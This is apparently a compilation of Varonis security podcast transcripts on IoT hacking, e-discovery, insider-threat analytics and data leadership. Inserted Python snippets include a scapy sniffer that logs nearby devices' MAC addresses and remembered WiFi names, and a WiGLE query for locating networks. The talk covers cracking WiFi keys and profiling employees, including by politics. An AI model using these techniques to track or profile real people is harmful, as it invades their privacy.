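# Assumes a WiFi adapter already in monitor mode on "wlan0mon".
from scapy.all import sniff, Dot11ProbeReq

def show_probe(pkt):
    if pkt.haslayer(Dot11ProbeReq):
        # The SSID element carries the network name the client is asking for.
        ssid = getattr(pkt, "info", b"").decode(errors="replace") or "<broadcast>"
        # addr2 is the transmitting client's MAC address.
        print(f"{pkt.addr2} is asking: are you there, {ssid}?")

# Needs root; each probe reveals a network the device remembers.
sniff(iface="wlan0mon", prn=show_probe, store=False)
```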
What wigle does — I think it stands for Wireless Geographic Logging Engine, which is crazy … security researchers have been out with wireless sniffers and scanners and mapped the GPS coordinates of all the wireless devices they see.
And then they collate that onto wigle.net, which is a database you can basically query by wireless network name … and work out where those networks are.
So it's really easy. You can track people using the WiFi on their phones using wigle.net. You can find WiFi devices. A great example of that was how we found the iKettle: you can search wigle.net for kettles. It's crazy!
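(To make that wigle.net lookup concrete, here's a rough sketch of a search against WiGLE's public v2 API using Python and requests. The endpoint, parameters, and response fields reflect my reading of WiGLE's published API and may differ; the SSID and credentials are placeholders, not anything from the interview.)

```python
# Rough sketch of a WiGLE network search by SSID.
import requests

API_NAME = "your-wigle-api-name"    # placeholder credential
API_TOKEN = "your-wigle-api-token"  # placeholder credential

resp = requests.get(
    "https://api.wigle.net/api/v2/network/search",
    params={"ssid": "iKettle"},      # search by network name
    auth=(API_NAME, API_TOKEN),      # HTTP Basic auth with API token
    timeout=30,
)
resp.raise_for_status()
for net in resp.json().get("results", []):
    # trilat/trilong are WiGLE's estimated coordinates for each network.
    print(net.get("ssid"), net.get("trilat"), net.get("trilong"))
```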
IOS: Yeah, I know. I was stunned. I had not seen this before. I suspect some of the manufacturers would be surprised if they saw this. We see the same thing in the enterprise space and IT. I'm just sort of surprised there are so many hacking tools out there.
But in any case, I think you mentioned that some of these devices start up as an access point and that, in that case, you know the default access name of the iKettle or whatever the device is, and then you could spot it.
Is this the way the hackers work?
Ken: Yes, that's right. The issue with an IoT WiFi device is that when you first set it up, you need to go through a process of connecting to it and then connecting it to your home WiFi network.
And that is usually a two-stage process. It depends, and some devices don't do this, but most devices, say the iKettle, will set themselves up as an access point or client-to-client device first, and then once you go in and configure them with your cell phone, they switch into becoming a client on your WiFi network. It's in that setup process that we also found issues, and that's where you can have some real fun.
IOS: Right. I think you took the firmware of one of these devices and then were able to figure out, say, a default password.
Ken: Yeah. That's another way. It's a completely different attack. So that's not what we'll do in the iKettle. We didn't need to go near the firmware.
But a real game changer with IoT devices is that the manufacturer is putting their hardware in the hands of their customers … Let's say you're a big online retailer. Usually you bring customers in through a web application and they buy stuff.
With the Internet of Things, you're actually putting your technology -- your kit, your hardware, your firmware, your software — into the hands of your consumers.
If you know what you're doing, there are great things you can do to analyze the firmware. You can extract it off the devices, and going through that process, you can see lots of useful data. It's a real game changer: a web application you can protect with a firewall … But with the Internet of Things, you put your chips into the hands of your customers, and they can potentially do stuff with them if you haven't got security right.
IOS: Right. Did you say they should have encrypted the firmware or protected it in some way? Is that right?
Ken: Yeah. Again, that's good practice. In security, we talk about having layers of defense, what we call defense in depth so that if any one layer of the security chain is broken, it doesn't compromise the whole device.
And a great example of getting that right would be to make sure you protect the firmware. You can digitally sign the code so that only valid code can be loaded onto your device. A very common design problem is that manufacturers haven't looked at code signing, and therefore we can upload rogue code.
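(A minimal illustration of that code-signing idea, not any vendor's actual update mechanism: the build system signs the firmware image, and the device, holding only the public key, refuses images whose signature doesn't verify. This sketch uses Python's cryptography package with Ed25519 keys as an assumed choice.)

```python
# Sketch of firmware code signing and verification.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# In real life the private key stays with the vendor's build system and only
# the public key is baked into the device.
vendor_key = Ed25519PrivateKey.generate()
device_trusted_key = vendor_key.public_key()

firmware = b"...compiled firmware image..."
signature = vendor_key.sign(firmware)

def firmware_is_trusted(image: bytes, sig: bytes) -> bool:
    try:
        device_trusted_key.verify(sig, image)  # raises if the image was tampered with
        return True
    except InvalidSignature:
        return False

print(firmware_is_trusted(firmware, signature))                 # True
print(firmware_is_trusted(firmware + b"backdoor", signature))   # False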
A good example of that was the Ring doorbell. Something that's attached to the outside of your house. You can unscrew it. You can walk off with it. And we found one bug whereby you can easily extract the WiFi key from the doorbell!
Again, the manufacturer fixed that really quickly, which is great, exactly what we want to see, but our next step is looking at it and seeing if we can take the doorbell, upload a rogue code to it, and then put it back on your door.
So we've actually got a back door on your network.
IOS: Right, I know. Very scary. Looking through your blog posts, there were a lot of consumer devices, but there was one that was, I think, in more of a borderline area, and ironically it was a camera. It could potentially be a security camera. Was that the one where you got the firmware?
Ken: Yeah, that was an interesting one. We've been looking at some consumer grade CCTV cameras, although we see these in businesses as well. And we've particularly been looking at the cameras themselves and also the digital video recorders, the DVRs where they record their content onto.
So many times we find someone has accidentally put a CCTV camera on the public Internet. You've got a spy cam into somebody's organization! The DVRs that record all the content, sometimes they put those on the Internet by mistake as well. Or you find the manufacturer built it so badly that … it puts itself on the Internet, which is just crazy.
IOS: Yeah, there are some stunning implications, just having an outsider look into your security camera. But you showed that you were able to, from looking at either the firmware or the device once you got into it, then get into the network. Was that right?
Ken: Yeah, it's quite ironic really, isn't it? A CCTV camera is something you'd consider a security device. And what we found is that not just the camera but also the DVR, if you put it on your network … it can create a backdoor onto your network as well. So you put in a security device that makes you less secure.
IOS: One of the things you do in your assessments is wireless scanning, and you use something, if I'm not mistaken, called Kismet?
Ken: Kismet's a bit old now … There are lots of tools around, but the Aircrack suite is probably where it's at right now. It's a really good suite for wireless scanning and wireless key cracking.
IOS: Right. So I was wondering if you could just describe how you do a risk assessment. What would be the procedure using that particular tool?
Ken: Sure. At its most basic, let's say you're looking at your home WiFi network. Basically, we need to make sure your WiFi is nice and safe, and the security of a WiFi key comes down to how long and complex it is.
It's very easy to grab an encrypted hash of your WiFi key by sitting outside with a WiFi antenna and a tool like Aircrack. What we then want to do is try and crack that offline. Once I've cracked your WiFi key, I'm on your network, and we find in a lot of cases that with ISP WiFi routers, the default passwords just aren't complicated enough.
And we looked at some of the ISPs in the U.K. and discovered that some of the preset keys, we could crack them on relatively straightforward equipment in as little as a couple of days.
IOS: Okay. That is kind of mind-blowing because I was under the impression that those keys were encrypted in a way that would make it really difficult to crack.
Ken: Yeah, you hope so, but again, it comes down to the length and complexity of the key. If your WiFi network key is only, say, eight characters long, it's not really going to stand up to a concerted attack for very long. So again, length and complexity are really important.
IOS: Yeah, actually we do see the same thing in the enterprise world, and one of the first recommendations security pros make is that keys and passwords have to be longer, at least eight characters.
Ken: There's also the character set. We often find the WiFi router key might only have lowercase characters and maybe some numbers, and those numbers and characters are always in the same place in the key. If you know where they are and you know they're always going to be lowercase, you've reduced the complexity.
IOS: Right.
Ken: So I'd really like to be seeing 12-, 15-, 20-character passwords.
It's not a difficult thing. Every time you get a new smartphone or a new tablet, you have to go and get the key from the router, but really I think people can cope with longer passwords that they don't use very often, don't you think?
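(Some back-of-the-envelope arithmetic on Ken's length-and-character-set point. The guess rate below is an assumed round number for illustration, not a benchmark of any real cracking rig.)

```python
# Illustrative keyspace arithmetic: how length and character set change the
# time to exhaust every possible key at an assumed offline guess rate.
GUESSES_PER_SECOND = 100_000  # assumed rate, for illustration only

def years_to_exhaust(charset_size: int, length: int) -> float:
    keyspace = charset_size ** length
    return keyspace / GUESSES_PER_SECOND / (3600 * 24 * 365)

# 8 lowercase letters vs. 12 mixed-case letters and digits
print(f"8 chars, a-z only:       {years_to_exhaust(26, 8):,.2f} years")
print(f"12 chars, a-z, A-Z, 0-9: {years_to_exhaust(62, 12):,.0f} years")
```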
IOS: No, I absolutely agree. We sort of recommend, and we've written about this, that you can...as an easy way to remember longer passwords, you can make up a mnemonic where each letter becomes part of a story. I don't know if you've heard of that technique.
You can get a 10-character password that's easy to remember and therefore becomes a lot harder to crack. We've also written a little bit about some of the cracking tools that are easily available, and I think you mentioned one of them.
Was it John the Ripper?
Ken: John is a password brute force tool and that's really useful. That's great for certain types of passwords. There are other tools for doing different types of password hashes but John is great. Yeah, it's been around for years.
IOS: It's still free.
Ken: But there are lots of other different types of tools that crack different types of password.
IOS: Okay. Do you get the sense that, just going back to some of these vendors who are making these devices, I think you said that they just probably are not even thinking about it and perhaps just not even aware of what's out there?
Ken: Yeah, let's think about it. The majority of start-up, entrepreneurial organizations trying to bring a new IoT device to market have probably got some funding. And if they're building something, it's probably going into production nine months down the line.
Imagine you've got some funding from some investors, and just as you're about to start shipping, somebody finds a security bug in your product!
What do you do? Do you stop shipping and your company goes bust? Or do you carry on and try to deal with the fallout?
I do sympathize with these organizations, particularly if they had no one giving them any advice along the way to say, "Look, have you thought about security?" Because then they're backed into a corner. They've got no choice but to ship or their business goes bankrupt, and they've got no ability to fix the problem.
And that’s probably what happened with the guys who made the WiFi kettle. Some clever guys had a good idea, got themselves into a position where they were committed, and then someone finds a bug and there's no way of backing out of shipping.
IOS: Right, yeah. Absolutely all true. Although we like to preach something called Privacy by Design — at least it’s getting a lot more press than it did a couple of years ago — which is just that people in the C-suite should be aware that you have to start building some of these privacy and security ideas into the software.
Although it's high-sounding language. And you're right, when it comes to it, a lot of companies, especially start-ups, are really going to be forced to push these products out and then send out an update later, I guess is the idea. Or not. I don't know.
Ken: That's the chance, isn't it?
So if you look at someone like Tesla, they've had some security bugs found last year and they have the ability to do over-the-Internet updates. So the cars can connect over WiFi and all their security bugs were fixed over the air in a two-week period!
I thought that was fantastic.
So they can update in the field … if you've figured that out, brilliant. But many manufacturers don't have the ability to do updates once products are in the field. Then you end up in a real fix, because you've got products you can only repair by recalling them, which is a huge cost and terrible PR. So hats off to Tesla for doing it right.
And the same goes for the Ring doorbell. The guys thought about it. They had a process whereby getting updates out is really, really easy, so issues are easy to fix, and they patched the bug we found within about two weeks.
And that's the way it should be. They completely thought about security. They knew they couldn't be perfect from the beginning: "Let's put a capability in place, a mechanism, so we can fix anything that gets found in the field."
IOS: Yes. We're sort of on the same page. Varonis just sees the world where there will always be a way for someone to get into especially newer products and you have to have secondary defenses. And you've talked about some good remediations with longer passwords, and another one we like is two-factor authentication.
Any thoughts on biometric authentication?
Ken: Yes. Given that the majority of IoT devices are controlled by a smartphone, I think it's really key for organizations to think about how they authenticate the customer to the smart device or, if they have a web app, to the web interface as well.
I'm a big fan of two-factor authentication. People get their passwords stolen in breaches all the time. And because they reuse their passwords across multiple different systems, a password stolen from one place means another place gets compromised.
There was a great example, I think, in one of the big data breaches … a password was stolen in one breach and then someone's account somewhere else got "hacked." It wasn't hacked. They had just reused the password!
IOS: Right.
Ken: So I'm a real fan of two-factor authentication to prevent that happening. Whether it's a one-time SMS to your phone or a different way of doing it, I think two-factor authentication is fantastic for helping the average Joe deal with security more easily. No one's going to have an issue with, "Look, you've sent me an SMS to my phone. That's another layer of authentication. Great. Fantastic."
I'm not so much a fan of biometrics by themselves, and the reason for that is my concern about revocation. Companies get breached all the time, and when it's just passwords that are lost, we throw them away and get new ones. But if we lose your biometric, we're in a bit more of a difficult position.
But I do think biometrics work brilliantly when they're combined with things like passwords. Biometric plus password is fantastic as secure authentication.
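(To illustrate the one-time-code idea behind that second factor, here's a short sketch of the standard TOTP scheme from RFC 6238 rather than SMS delivery; the shared secret is a made-up example value, and this is not a description of any vendor's implementation.)

```python
# Time-based one-time password (TOTP, RFC 6238) in plain Python.
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval                 # 30-second time step
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                             # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# Example shared secret (base32); both the server and the user's device hold it.
print(totp("JBSWY3DPEHPK3PXP"))  # prints the current 6-digit code
```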
IOS: Thanks for listening to the podcast. If you're interested in following Ken on Twitter, his handle is TheKenMunroShow or you can follow his blog at PenTestPartners.com. Thanks again.
Since security pertains to everyone, in this episode of the IOSS we challenged ourselves to tie security back to Kevin Bacon. You might have to give us a few passes, but the connection is still strong.
Keira Knightley: Earlier this year, a man applied for a credit account at Best Buy using Keira Knightley’s driver’s license information. If they hadn’t caught him, it would have affected her FICO score.
And speaking of FICO, they just created an Enterprise Security Score, which rates how secure an organization is. We debated whether or not a score will improve security.
Chris Pine: Knightley was in Jack Ryan: Shadow Recruit with Pine. He worked undercover as a compliance officer at an investment firm.
If Pine was a compliance officer for a security firm that profited by tanking a medical device stock, I’m guessing he’d have to raise a red flag.
Harrison Ford – Ford also played the character Jack Ryan, in Clear and Present Danger, so Pine and Ford are practically the same person. But it was his role as a doctor in The Fugitive that caught our attention.
While Ford played a doctor who was framed for murder, recently a woman’s stolen identity almost landed her in jail. And we discussed the dangers of medical identity theft.
The Obamas – The Obamas invited Harrison Ford to the White House. It impressed us that the White House now has a CISO.
Tom Hanks – Hanks narrated Obama’s “The Road We’ve Traveled.”
Kevin Bacon – And lastly, Hanks and Bacon appeared in Apollo 13.
Listen in and join the fun!
The post Six Degrees of Kevin Bacon (Security Edition) – IOSS 24 appeared first on Varonis Blog.
In this second podcast, Bennett continues where he left off last time. Borden describes his work on developing algorithms to find insider threats based on analyzing content and metadata.
Andy: Thanks, Cindy. And again welcome, Bennett. Thank you for joining this call. So we're really excited to have you, and mostly because you have this unusual background that bridges law and data analysis. You've also written some really interesting articles on the subject of applying data science to e-discovery. I'm wondering for our non-lawyer readers of the blog, can you tell us what discovery is and how it has led to the use of big data techniques?
Bennett: Sure, absolutely. And Andy and Cindy, thanks for having me. So discovery is a process in litigation. When two or more parties get into litigation, the rules of discovery require the parties to trade information about whatever the case is about. So if you think of a patent infringement case or a breach of contract case, the two parties ‘serve discovery’—that’s what it's called—on each other. This is basically a game of Go Fish. And one side says, "Give me all your documents about the formation of the contract," and then the other side has to go and find all those documents.
Varonis: As you can imagine, in the information age, that could be anything!
You've got to go find all the emails about that and all the documents like Word or PowerPoint. Depending on the case, it could be things like server logs or financial or HR data. It becomes quite the hunt in this modern age.
Bennett: That's exactly right.
Varonis: The problem is finding relevant documents. And this problem of finding relevancy and how to decide whether a document is relevant would seem to lead to some ideas in data science.
Bennett: Yes, and that's what's been really great about the advent of the information age and big data analytics in the last few years. Discovery has been around since the 1960s, but it was initially a paper endeavor. You had to go to file cabinets and file rooms and you'd find stuff, and copy it, and hand it over. But as we’ve gotten into computerized systems and databases and especially email, it's become really quite burdensome. Millions of dollars are spent trying to find and locate these documents. It began as an issue of search technology, having to search these different repositories, document management systems and file servers and email servers.
Then as data analytics came online, we have these advanced machine learning search capabilities. As I find something that I'm looking for, it's basically a “more like this” search, and analytical tools can help us understand the characteristics of what they call responsive documents and help us find more like that. It's greatly increased the efficiency of the discovery process.
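(A toy version of that "more like this" idea: train on documents lawyers have already coded as responsive or not, then rank unreviewed documents by predicted probability. This sketch uses scikit-learn, and the documents and labels are invented for illustration; it is not the tooling Bennett's team used.)

```python
# "More like this" sketch: rank unreviewed documents by predicted responsiveness.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression

# Documents a reviewer has already coded (1 = responsive, 0 = not responsive).
reviewed_docs = [
    "attached is the signed contract amendment",
    "see the draft terms for the supply agreement",
    "lunch on friday?",
    "company picnic photos",
]
labels = [1, 1, 0, 0]

vectorizer = TfidfVectorizer(ngram_range=(1, 2))
X = vectorizer.fit_transform(reviewed_docs)
model = LogisticRegression().fit(X, labels)

# Score the unreviewed pile and surface the likeliest responsive documents first.
unreviewed = ["please countersign the contract amendment", "parking lot closed monday"]
scores = model.predict_proba(vectorizer.transform(unreviewed))[:, 1]
for doc, score in sorted(zip(unreviewed, scores), key=lambda pair: -pair[1]):
    print(f"{score:.2f}  {doc}")
```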
Bennett: Yeah. This is really one of the most interesting parts of data science and its convergence with the legal sphere, because if you think about it, a lawyer's most fundamental product is really information. As a litigator, as a corporate lawyer, what we're trying to figure out is what happened and why: sometimes it’s whose fault it is, or even trying to understand the value of a transaction or the value of a company, or the risk that's associated with certain kinds of securities transactions. All of that is based on information. The easier it is and the more accurately and quickly you can get at certainty of information, the better legal product you have.
We started playing with these techniques, the same techniques that were helping us find information relevant to a case, and tried to apply them in different settings.
One of the most obvious is investigation settings, like a regulatory investigation or even an internal investigation. It's the same kind of principle, you're looking for electronic evidence of what happened. And that kind of pushed us into some interesting other areas.
If you think about how a merger or acquisition happens, company A wants to buy company B, and so company A asks a bunch of questions — what they call due diligence. They want to know what your assets and liabilities are, what risks you might face, what are your uncollectible accounts, and, say, do you have any kind of environmental risk or litigation going on.
The information provided by the target company is used to get an understanding of the value of the target, and that's what determines the purchase price. The more certain that information is or that value is, the fairer the price. When you start getting fluctuations in price, it really reflects the amount of uncertainty over the value of the company.
Often when these companies trade information, they don't have a clear picture of the other side. We started using these electronic discovery and big data techniques in the due diligence process to get clearer information.
Bennett: Yeah. And this is what's interesting! When we were talking to our M&A lawyers, as one of the endeavors, we were going around to different practice groups in the firm and saying, "Look, I have this skill set where I can get you information. How would that be valuable to you?" One of the lawyers I was talking to, the head of the M&A group, said, ‘Look, our biggest problem is that we don't really know much about what they're telling us and how accurate it is.’
Every M&A transaction has a provision, which they call an indemnification provision, that basically says, ‘You're going to tell me about your company, and then I'm going to give you some money for the company, but if I find out that what you told me was not accurate, then to the extent it wasn't accurate, I get to adjust my purchase price after.’ In other words, I get a refund of whatever the differences in value are.
The problem with these indemnification provisions is that they are only open for like 30 or 60 days. Usually it's very hard to figure out whether the information is accurate within that very short period of time.
So in this particular case, our client, the purchaser, had some doubts about the veracity of some of the information coming out of the other side, but really couldn't prove one way or the other. Literally the day that the purchase closed, we owned all the information assets at the company we bought.
We swooped in and did a data analysis, looking at all the information they had given us, and then walked it back through time. How did they come up with these figures in their disclosures? What was the internal discussion going on with their internal people and their outside auditors?
We were able to show there was a pretty wide variance between what they told us and what is a reasonable basis for the valuation.
We got millions of dollars back on that purchase price, and we've been able to do that over and over again now because we are able to get at these answers much more quickly in electronic data.
Varonis: We're definitely on the same page: there's a lot of information on file systems, and data science can help pull it out!
Back in December, we heard you speak at the CDO Summit here in New York City, and you also mentioned a system that you helped develop that can spot insider threats during and even before the actual incident. And I think you said you analyzed both the actual content and meta-content or metadata. Can you talk a little bit more about that system?
Bennett: Sure. You know, this is one of the most intriguing things that I think we've done. And it sprang out of this understanding that electronic data inside of a company, and really anywhere, is really evidence of where someone has been at a certain point in time, and what they thought or did or purchased or communicated. So you can actually watch how decisions are made or how actions start to be undertaken. All of us go through our everyday lives, especially at work, leaving trails behind of conversations with people, emails back and forth, and how we come to decisions. All of these things are now kept in this electronic record. We have this sociological record, more than we've ever had as a species, really! If you know how to get at those facts and how to put them together, you can really find out how just about anything came about.
I came out of the intelligence community before going to law school, and so figuring out what happened and why has been my background for my entire career.
What we figured out in data science is we are pretty good at being able to predict what people are going to do as consumers. For example, this is why your Amazon suggestions, your gift basket, or your Netflix suggestions on movies, or the coupons they spit out at the local pharmacy are based on predictions of what you’re going to do.
I thought if we can predict what someone's going to like or what someone's going to buy, surely I can predict if someone's going to do something wrong, because just like there's patterns in all human conduct, there's patterns in misconduct as well.
So we tested this. We took a number of data sets that we had basically found in a discovery process-- a litigation or a regulatory investigation that was about corporate misconduct, something like financial statement fraud-- and all of these documents had already been analyzed by teams of lawyers to figure out which ones of those were relevant to the underlying misconduct.
I had a target variable indicating whether a document was or was not related to the underlying misconduct.
We built algorithmic models, predictive models, based on these underlying data, across all sorts of different kinds of misconduct, and it turned out that misconduct is actually highly predictable.
We worked with some of my colleagues back at the intelligence agencies, some folks at the FBI, and some social scientists who worked with the psychology of fraud and the psychology of wrongdoing, and developed this algorithmic model that had aspects of text mining: the words and phrases people used.
Some of it was based on social network analysis—looking at who was talking to who, and when, or strange patterns in communication, especially outside of work hours, people that don't normally talk to each other, or siphoning off communications outside of the network to personal email accounts.
A significant part of this was conducting sentiment analysis. It turns out that sentiment analysis actually made up a large proportion of the predictive algorithm. After putting all of these features together into a model, it was stunningly accurate: we could find patterns, as they began to develop, showing that people were either engaging in some kind of misconduct or that a situation was ripe for such misconduct to occur.
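(A hedged sketch of how content and metadata signals like the ones Bennett lists might sit side by side in a single model. The messages, metadata flags, and labels are invented, and this is emphatically not his firm's algorithm, just the general pattern of stacking text features next to behavioral features.)

```python
# Sketch: combine text features with simple behavioral metadata in one classifier.
import numpy as np
from scipy.sparse import csr_matrix, hstack
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression

bodies = [
    "let's keep this off the books for now",
    "forwarding the figures to my personal gmail",
    "minutes from the quarterly planning meeting",
    "cafeteria menu for next week",
]
# Invented metadata per message: [sent outside work hours, recipient outside the company]
meta = np.array([[1, 0], [1, 1], [0, 0], [0, 0]])
labels = [1, 1, 0, 0]  # 1 = coded as related to misconduct in this toy training set

text_features = TfidfVectorizer().fit_transform(bodies)
X = hstack([text_features, csr_matrix(meta)])  # content and metadata in one matrix

model = LogisticRegression().fit(X, labels)
print(model.predict_proba(X)[:, 1])  # a risk-style score per message
```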
Bennett: Yes, that's exactly right. We looked specifically at the temporal aspect of misconduct. Catching someone after they've done it, after the horse is out of the barn, is easier; what's harder is, can we actually see the misconduct coming? So we built this model where we had a set of data, some of which we used to build the model and of course some of which we used to test it on, and we focused specifically on the behavior leading up to the misconduct. So could we catch it earlier?
And that's where it's really interesting to see the dynamics, the sociological dynamics of how a corporation works, and people's frustration levels and feelings of acceptance and support. Was there some kind of loyalty-severing event? It was really quite an interesting sociological effort.
Varonis: Absolutely, yeah. The researchers talk about trigger events that will push an insider over the line, so to speak. But we've also learned, as you suggested, that the insiders will actually try it out, they'll try to do some test runs to see how far they can get. And it sounds like your algorithms would then spot this. In other words, stop them before they actually do the act of copying or destruction or whatever it is.
Bennett: That's exactly it.
Varonis: Yeah. We call that user behavior analytics, or UBA. That's the industry term for it. So it sounds like you think that's the right approach. Not everyone follows that way of finding these behaviors, or catching insiders, I should say, but it sounds like behavior is something that you're very interested in spotting.
Bennett: It is. You know, it's fraught with very interesting issues. One of the things that I speak about quite often is the ethical use of data analytics. And there are certainly issues here. A lot of the triggering events, the triggers that come into misconduct situations, have to do with people's personal lives, some kind of personal crisis or financial crisis, drug or alcohol dependencies, and a lot of it has to do with their interaction with their colleagues and superiors, stressful situations and feelings of ingratitude or not being recognized for their worth, and those are very personal things. And one of the things we tested, as part of a graduate program I was involved in at New York University, is what you could tweak this algorithm to find. We actually did some test runs. Could you find all the Republicans? Could you find people of a particular political belief? And you can!
And it's very disconcerting to realize that these kinds of algorithms can really find just about anything. So then the question becomes, "What's the right thing to do?"
What responsibility do we have as a company or especially a public company to monitor behavior and to monitor compliance, and yet not interfere with people's personal lives? It's a very interesting question that the law is really not settled on, and is something that we have to consider as data analysts.
Varonis: Yeah, that's very interesting. The question is, "When do you turn it on?" Should it be on all the time or do certain conditions justify it? So yeah, I absolutely agree that is an issue for companies.
I have one last question for you, and it has to do, again, with the insiders who go bad: they're in a powerful position, they actually created the content, and they feel like they own it.
And these people are sometimes very hard to spot because they're the creators, they could be high-level executives, they own the content, and it's sometimes hard to determine whether they've actually done something wrong.
They may be copying a lot of directories or files to a laptop, but that's just part of their job. So we are big believers in just keeping some basic audit trails on file activities, outside of any of the algorithms that we were talking about. So do you think that is just a minimal thing for companies to do?
Bennett: It is. It's interesting, because it's why we built the algorithms to capture so many different kinds of behaviors, so that one person could not hide their trail well enough. But there are basic things companies should do to understand where their most valuable information is and where it's going. There is very simple technology out there, far short of these kinds of advanced algorithms, that lets you understand where valuable information is being routed and where it goes. So it's common sense. In the Information Age, a company's most valuable asset really is information. So having what we call information governance principles, understanding and governing your information as you would any other asset, is just good business.
Varonis: Right, absolutely agree.
So thank you so much, Bennett, for your insights today. Bennett, if people want to learn more about what you do and follow you on Twitter, do you have a handle or a website that you can share with everyone?
Bennett: Yes, thanks. My handle is @BennettBorden. And then most of my publications are on the firm's webpage at DrinkerBiddle.com under my profile. We write fairly often on this, and I would certainly welcome any thoughts from your listeners.
When it comes to ransomware, we can’t stop talking about it. There’s a wonderful phrase for our syndrome, “the attraction of repulsion,” meaning that something is so awful you can’t stop watching and/or talking about it.
How awful has ransomware been? According to the FBI, in the first three months of 2016, ransomware attacks cost their victims a total of $209 million. And it doesn’t stop there. It’s impacted many businesses including financial firms, government organizations, healthcare providers, and more.
In this episode of the Inside Out Security Show (IOSS), we cover three types of ransomware: CryLocker (impersonates the US government), FairWare (targets Linux users), and yes, fake ransomware.
While some might disagree on whether or not to pay the ransom, we can all agree that ransomware is the canary in the coal mine.
The post Attraction of Repulsion (to Ransomware) – IOSS 23 appeared first on Varonis Blog.
Once we heard Bennett Borden, a partner at the Washington law firm of DrinkerBiddle, speak at the CDO Summit about data science, privacy, and metadata, we knew we had to reengage him to continue the conversation.
His bio is quite interesting: in addition to being a litigator, he’s also a data scientist. He’s a sought-after speaker on legal tech issues. Bennett has written law journal articles about the application of machine learning and document analysis to e-discovery and other legal transactions.
In this first part in a series of podcasts, Bennett discusses the discovery process and how data analysis techniques came to be used by the legal world. His unique insights on the value of the file system as a knowledge asset as well as his perspective as an attorney made for a really interesting discussion.
In this second podcast, Mr. Wendell continues where he left off last time.
He explains the skills you’ll need in order to be an effective Chief Data Officer and we learn more about MIT’s International Society of Chief Data Officers.
Richard: Yeah, there are really three categories of skills.
The first category is what I'll call the traditional IT skillset. The second is more of a math skillset, and the third is really, like you mentioned, around communication, and even HR and change management. So I can talk to each of those briefly.
Information Technology
It's an interesting role, right, because typically, people who are strong in IT may not have as much background or expertise in math or HR, and you could say that about the other two as well. These are three different areas of skills that often do not overlap, and to be a good CDO, you absolutely must have all three skill areas.
The IT skillset is all about new data technology. If you go online and look at search terms, the number one phrase most commonly associated with the chief data officer is data science.
Data science, again, means a lot of things to a lot of people. But chief data officers and chief analytics officers manage the data science function.
Data science takes place in most companies now on top of newer data technology stacks. There are so many new technologies emerging every day that are absolutely critical for managing the data science and data integration function.
And so it's about being able to go in and work with the IT department on building out that technology suite, and even occasionally standing up IT infrastructure with these new kinds of tools. The IT department is typically focused more on very proven, enterprise-scale technologies that can be deployed to maximize IT ROI, and that is what they should be focused on. That's the perfect focus for IT.
But if that's all you do as a company, then you're never going to experiment with some of these new technologies that are really required to do data science well, and this is where a CDO comes in.
So, you know, it's really important to be able to stand up and manage some of these new technologies, and you have to be a hacker to make it work. I mean, a lot of companies I know spend a year and a half just trying to figure out how to productionize their Hadoop cluster inside their firewalls. So you have to know how to hack through these things and hack around them. I find a lot of my peers in the CDO community grew up as hackers, and you really have to have that hacker mindset and enjoy problem solving.
Mathematics
The second area, math, is really all about algorithms, so you need to understand machine learning. You need to know the different flavors of machine learning and how they're applied. And I think in order to be good, you need to be able to get down to a fairly detailed level with your data scientists to talk about different packages, how they're applied, and the different parameters they're using in their models. Machine learning is just one area that's really hot right now, but advanced analytics and statistics all have many different models that are used to solve different types of problems.
And operations research, frankly, is an area that's often overlooked. There are many powerful quantitative techniques that come out of operations research, and increasingly now computer science, that are all really important and all have their place; they're just different tools for different jobs. So you need a toolkit of algorithms and to know which one or ones are best applicable to different business use cases.
If you want to do a cluster analysis with a huge dataset, maybe you want to do a simple k-means. If you have a smaller dataset and you think you can get more insight out of it, then maybe you do hierarchical clustering. It's just one simple example, but you need to be able to match the business use case and the scale of data to the algorithm.
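(A small illustration of matching the algorithm to the data: k-means scales comfortably to large datasets, while agglomerative, i.e. hierarchical, clustering is easier to inspect on smaller ones. The data here is synthetic, and scikit-learn is an assumed choice of library.)

```python
# Compare k-means and hierarchical (agglomerative) clustering on synthetic data.
import numpy as np
from sklearn.cluster import KMeans, AgglomerativeClustering

rng = np.random.default_rng(0)
# Two well-separated blobs of 100 points each in 2D.
X = np.vstack([rng.normal(0, 1, (100, 2)), rng.normal(5, 1, (100, 2))])

kmeans_labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(X)
hier_labels = AgglomerativeClustering(n_clusters=2).fit_predict(X)

print("k-means cluster sizes:     ", np.bincount(kmeans_labels))
print("hierarchical cluster sizes:", np.bincount(hier_labels))
```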
Change Management
And then the third area, I mentioned the HR skillset, is really around change management. This is where most companies I see really fall down because most companies focus on insight.
Insights are great. Insights don't make money.
And this is where I'm talking specifically about 20th-century companies that are looking to be 21st-century companies. Companies like that are filled with a lot of really great talent that's just not used to being data-driven in their workflows. And quite often there's resistance to data.
Maybe folks, at the end of the day, feel that their gut is going to give a better answer than a computer or an algorithm, and look, I'm not saying let's throw away gut feel. There are still many cases where we have to use gut feel, but I do believe that increasingly, over the next few decades, there are going to be a lot of knowledge workers that...their jobs are not going to be automated but they're going to be augmented.
They will be using data. They'll be using analytics to more directly inform the decision that used to be made more on gut feel, not replacing them but augmenting. And getting folks who are not used to trusting a dashboard to trust the dashboard is really hard. It's really hard. It's change management, and there are reams and volumes written on change management.
I've done a lot of this. I did a lot at American Express. You know, change management in business units, to become more data driven, there's a lot of best practices that go along with this.
And by the way, that skillset has nothing to do with IT and nothing to do with the math, the first two skillsets I mentioned.
So, yeah, you're right. It's a very heterogeneous job that requires a very cross functional skillset to be successful.
Inside Out Security: It sounds like you need to start working when you're 15 years old.
Richard: You know, it's interesting. There's a lot to learn, I think, to be an effective chief data officer, for sure.
Richard: That's a really, really good way of putting it. You're absolutely right. It's curiosity across all three of those areas.
But it's something that I don't want to be discouraging.
I think that folks, more often than not, earlier on in their careers, specialize in maybe the first area, or the second area, maybe IT or math, and then expand over time to have all three of those critical areas checked.
